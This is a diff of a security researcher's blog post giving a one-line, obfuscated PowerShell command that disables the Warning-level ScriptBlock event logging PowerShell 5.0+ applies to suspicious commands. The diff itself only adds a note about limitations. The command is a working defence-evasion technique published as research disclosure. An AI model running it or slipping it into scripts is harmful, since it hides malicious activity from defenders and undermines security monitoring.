cobbr/cobbr.io/_posts/2017-05-02-ScriptBlock-Warning-Event-Logging-Bypass.md

 ## tl;dr

 PowerShell 5.0+ automatically logs Warning level ScriptBlock EventLogs when executing "suspicious" commands commonly associated with malware, *even if ScriptBlock logging is not enabled*.
-This is a one-line bypass of that logging capability:
+This is a one-line bypass of that logging capability: (*note: there are limitations, please see the end of this post for more details*)

 ```
 PS> [ScriptBlock]."GetFiel`d"('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))